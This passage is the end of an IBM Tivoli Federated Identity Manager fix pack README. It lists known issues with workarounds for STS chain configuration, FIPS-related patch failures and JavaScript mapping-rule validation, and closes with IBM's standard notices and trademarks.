      • Default Chain uscForgottenPassword - The USC Secret Question Module (validate mode) must be added after Default USC Account Recovery Module (validate mode). The USC Secret Question Module (issue mode) must be added after Default USC VMM Entity Module (map mode).
      If the STS chains are not successfully upgraded, you need to modify the chains manually.
      1. Navigate to Tivoli Federated Identity Manager > Configure Trust Service > Trust Service Chains.
      2. Select the chain you want to modify.
      3. Click Modify Chain.
      4. Click Continue with Modification.
      5. Modify the corresponding chains such that they appear as provided in the bulleted list.
    10. Click Load configuration changes to the Tivoli Federated Identity Manager runtime.

    Patch installation fails when Federal Information Processing Standard (FIPS) is enabled for WebSphere Application Server

    Issue:

    Patch installation fails when FIPS is enabled for WebSphere Application Server where Tivoli Federated Identity Management is deployed.

    Workaround:

    Before installing the patch, disable FIPS for WebSphere Application Server where Tivoli Federated Identity Management is deployed.


    Import of Javascript mapping rule fails when the mapping rule throws an exception during validation

    Issue:

    Problem

    When you use the Tivoli® Federated Identity Manager console or command line to import a JavaScript mapping rule, an empty Security Token Service Universal User (STSUU) is used as an input to validate the JavaScript.

    Symptom

    Validating the JavaScript using an empty STUU input can cause problems. Problems occur when the JavaScript rule throws exceptions on cases that do not occur in their real federation runtime flow, but occurs when the empty STSUU is passed to the rule during validation.

    Cause

    If the JavaScript mapping rule throws an exception during validation, the Tivoli Federated Identity Manager console rejects it as bad syntax and does not load it.

    Diagnosing the problem

    When you use the Tivoli Federated Identity Manager console or command line to import a JavaScript mapping rule, the software runs basic JavaScript validation. The JavaScript validation process prevents the upload of a mapping rule with an invalid syntax.

    Tivoli Federated Identity Manager validates the JavaScript mapping rule with the JavaScript engine, which executes the mapping rule. JavaScript mapping rules have three context variables which can be accessed by name. The names correspond to Java objects, which are elements of a WS-Trust request. The names are also available in the STSModule interface seen by pure Java mapping rule developers. The three context variables, which come from the invoke method of the STSModule interface, are:
    When you run the JavaScript mapping rule at run time, the context variables are populated with real data based on the following factors:

    When the Tivoli Federated Identity Manager console or command line validates the mapping rule, no real request exists. The variables are then populated with empty objects.

    Your mapping rule might use conditional statements. The conditional statements make sense during real runtime operations, but do not work properly when empty objects are passed to it during validation.

    The following sample JavaScript mapping rule illustrates the problem:
    importPackage(Packages.com.tivoli.am.fim.trustserver.sts);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.uuser);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.utilities);

// Throw an STS exception if the STSUU does not contain an attribute I am expecting
var attrvalue = stsuu.getAttributeValueByName("myattr");
if (attrvalue == null) {
          IDMappingExtUtils.throwSTSException('missing attribute');

    Workaround:

    As a workaround, create an empty-object-aware JavaScript rule to prevent it from throwing exceptions when it detects the empty STSUU.

    Build a mechanism to detect the validation sequence into the rule itself and to not terminate with an exception if the rule is operating on empty objects.

    The detection code varies depending on the assumptions you can make about request objects in your runtime flow. For example, an STSUU typically contains one or more attributes in the Principal, AttributeList , or ContextAttributes sections of the STSUU.

    If it does not contain any attributes, it is an empty STSUU.

    To skip further rule execution using the workaround, author your JavaScript mapping rule using the following pattern:
    importPackage(Packages.com.tivoli.am.fim.trustserver.sts);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.uuser);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.utilities);

var isEmptySTSUU = (
  (stsuu.getPrincipalAttributeContainer().getNumberOfAttributes() == 0) &&
        (stsuu.getAttributeContainer().getNumberOfAttributes() == 0) &&
        (stsuu.getContextAttributesAttributeContainer().getNumberOfAttributes() == 0));
if (!isEmptySTSUU) {
    // rest of your normal runtime mapping rule logic goes here
    .......
}

    Auditing for RBA is not happening even though it is configured.

    Issue:

    Auditing for RBA is not happening even though it is configured.

    Workaround:


    Back to Contents


    Notices

    This information was developed for products and services offered in the U.S.A. IBM may not offer the products, services, or features discussed in this document in other countries. Consult your local IBM representative for information on the products and services currently available in your area. Any reference to an IBM product, program, or service is not intended to state or imply that only that IBM product, program, or service may be used. Any functionally equivalent product, program, or service that does not infringe any IBM intellectual property right may be used instead. However, it is the user's responsibility to evaluate and verify the operation of any non-IBM product, program, or service.

    IBM may have patents or pending patent applications covering subject matter described in this document. The furnishing of this document does not give you any license to these patents. You can send license inquiries, in writing, to:

    IBM Director of Licensing
    IBM Corporation
    North Castle Drive
    Armonk, NY 10504-1785
    U.S.A.

    For license inquiries regarding double-byte (DBCS) information, contact the IBM Intellectual Property Department in your country or send inquiries, in writing, to:

    Intellectual Property Licensing
    Legal and Intellectual Property Law
    IBM Japan, Ltd.
    1623-14, Shimotsuruma, Yamato-shi
    Kanagawa 242-8502 Japan

    The following paragraph does not apply to the United Kingdom or any other country where such provisions are inconsistent with local law:

    INTERNATIONAL BUSINESS MACHINES CORPORATION PROVIDES THIS PUBLICATION "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.

    Some states do not allow disclaimer of express or implied warranties in certain transactions, therefore, this statement might not apply to you.

    This information could include technical inaccuracies or typographical errors. Changes are periodically made to the information herein; these changes will be incorporated in new editions of the publication. IBM may make improvements and/or changes in the product(s) and/or the program(s) described in this publication at any time without notice.

    Any references in this information to non-IBM Web sites are provided for convenience only and do not in any manner serve as an endorsement of those Web sites. The materials at those Web sites are not part of the materials for this IBM product and use of those Web sites is at your own risk.

    IBM may use or distribute any of the information you supply in any way it believes appropriate without incurring any obligation to you.

    Licensees of this program who wish to have information about it for the purpose of enabling: (i) the exchange of information between independently created programs and other programs (including this one) and (ii) the mutual use of the information that has been exchanged, should contact:

    IBM Corporation
    2Z4A/101
    11400 Burnet Road
    Austin, TX 78758
    U.S.A.

    Such information may be available, subject to appropriate terms and conditions, including in some cases, payment of a fee.

    The licensed program described in this document and all licensed material available for it are provided by IBM under terms of the IBM Customer Agreement, IBM International Program License Agreement or any equivalent agreement between us.

    Any performance data contained herein was determined in a controlled environment. Therefore, the results obtained in other operating environments may vary significantly. Some measurements may have been made on development-level systems and there is no guarantee that these measurements will be the same on generally available systems. Furthermore, some measurement may have been estimated through extrapolation. Actual results may vary. Users of this document should verify the applicable data for their specific environment.

    Information concerning non-IBM products was obtained from the suppliers of those products, their published announcements or other publicly available sources. IBM has not tested those products and cannot confirm the accuracy of performance, compatibility or any other claims related to non-IBM products. Questions on the capabilities of non-IBM products should be addressed to the suppliers of those products.

    All statements regarding IBM's future direction or intent are subject to change or withdrawal without notice, and represent goals and objectives only.

    This information contains examples of data and reports used in daily business operations. To illustrate them as completely as possible, the examples include the names of individuals, companies, brands, and products. All of these names are fictitious and any similarity to the names and addresses used by an actual business enterprise is entirely coincidental.


    Trademarks

    IBM, the IBM logo, and ibm.com® are trademarks or registered trademarks of International Business Machines Corp., registered in many jurisdictions worldwide. Other product and service names might be trademarks of IBM or other companies. A current list of IBM trademarks is available on the Web at “Copyright and trademark information” at www.ibm.com/legal/copytrade.shtml.

    Adobe®, Acrobat, PostScript® and all Adobe-based trademarks are either registered trademarks or trademarks of Adobe Systems Incorporated in the United States, other countries, or both.

    IT Infrastructure Library® is a registered trademark of the Central Computer and Telecommunications Agency which is now part of the Office of Government Commerce.

    Intel®, Intel logo, Intel Inside®, Intel Inside logo, Intel Centrino®, Intel Centrino logo, Celeron®, Intel Xeon®, Intel SpeedStep®, Itanium®, and Pentium® are trademarks or registered trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

    Linux® is a trademark of Linus Torvalds in the United States, other countries, or both.

    Microsoft, Windows, Windows NT®, and the Windows logo are trademarks of Microsoft Corporation in the United States, other countries, or both.

    ITIL® is a registered trademark, and a registered community trademark of the Office of Government Commerce, and is registered in the U.S. Patent and Trademark Office.

    UNIX® is a registered trademark of The Open Group in the United States and other countries.

    Cell Broadband Engine™ and Cell/B.E. are trademarks of Sony Computer Entertainment, Inc., in the United States, other countries, or both and is used under license therefrom.

    Java and all Java-based trademarks and logos are trademarks or registered trademarks of Oracle and/or its affiliates.

    Other company, product, and service names may be trademarks or service marks of others.

    End of the IBM® Tivoli® Federated Identity Manager 6.2.2-TIV-TFIM-FP0018.README file.